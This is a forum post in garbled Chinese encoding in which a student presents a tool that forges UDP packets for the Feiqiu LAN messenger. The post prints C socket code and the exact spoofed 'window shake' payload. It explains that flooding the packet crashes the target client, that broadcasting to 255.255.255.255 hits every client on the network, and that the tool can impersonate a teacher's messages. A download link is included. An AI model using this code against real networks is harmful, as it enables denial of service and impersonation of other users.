編程練習(xí)作品 -> 飛秋攻擊Go

ID:71922 · 發(fā)表于 2015-1-10 22:21

在課室復(fù)習(xí)網(wǎng)絡(luò)編程，用抓包工具分析一些數(shù)據(jù)包，我們課室是用飛秋來傳送文件，突然想試試自己模擬飛秋數(shù)據(jù)包，來看看有什么效果。啊哈，果然和所想一樣，通過模擬數(shù)據(jù)包，可以做各種惡作劇，例如，模擬老師發(fā)送消息：到我辦公室一趟。

   于是這軟件就誕生了。設(shè)計(jì)這玩意原意是復(fù)習(xí)一下VC。。。而且現(xiàn)在開始學(xué)安卓，不太想花太多精力在這軟件上。所以也只完成了一些基本的功能。為了快點(diǎn)完成，就直接修改《機(jī)房維護(hù)小工具》的源碼，可能會(huì)有一些小BUG。并且可能有些信息顯示的是機(jī)房維護(hù)小工具的提示。。

   實(shí)現(xiàn)原理非常簡(jiǎn)單：先用抓包工具抓取飛秋的數(shù)據(jù)包，如抖動(dòng)窗口的數(shù)據(jù)包，然后用UDP發(fā)送即可。

源碼就不必公開了，很亂，實(shí)現(xiàn)原理很簡(jiǎn)單，下面貼出一段核心代碼。

int sockfd;
SOCKADDR_IN Addr;
char Cmd[200] = {0};
sockfd    = socket(AF_INET, SOCK_DGRAM, 0);
setsockopt(sockfd, SOL_SOCKET, SO_BROADCAST, &on, sizeof(on));
Addr.sin_addr.S_un.S_addr = inet_addr(IP);
Addr.sin_family = AF_INET;
Addr.sin_port =htons(2425);
sprintf(Cmd, "1_lbt4_0#128#000C29D68D8F#0#0#0#2.5a:1399716676:%s:%s:209:.", “ Love 夢(mèng)想”, "L、");
sendto(sockfd, Cmd, strlen(Cmd), 0, (struct sockaddr *)&Addr, sizeof(Addr));

需要說明的是，當(dāng)高頻率發(fā)送這個(gè)數(shù)據(jù)包，會(huì)讓對(duì)方的飛秋死掉。

這是抖動(dòng)窗口的數(shù)據(jù)包：1_lbt4_0#128#000C29D68D8F#0#0#0#2.5a:1399716676:用戶名:主機(jī)名:209:.",
向指定IP 發(fā)送這個(gè)數(shù)據(jù)包即可讓對(duì)方的飛秋的窗口

顫啊顫。。。

至于攻擊全部，那就更簡(jiǎn)單了，把IP設(shè)置為 255.255.255.255 即可，這樣整個(gè)局域網(wǎng)所有的飛秋程序的窗口都會(huì)顫啊顫，哈哈。。
如果指定攻擊的群聊組播地址，那么只要加入該組播的飛秋也能收到這個(gè)數(shù)據(jù)包。前提是它們有建立群。

通殺所有飛秋版本。由于飛秋是從飛鴿傳書源碼改來的，并且是相互兼容的，那么飛鴿傳書也應(yīng)受影響，未測(cè)試過。

下載地址: [color=#2907f8,strength=3)"]http://pan.baidu.com/s/1SD9k[url=http://pan.baidu.com/s/1kTMDshh][/url]

帳號(hào)		自動(dòng)登錄	找回密碼
密碼			立即注冊(cè)

編程練習(xí)作品 -> 飛秋攻擊Go

瀏覽過的版塊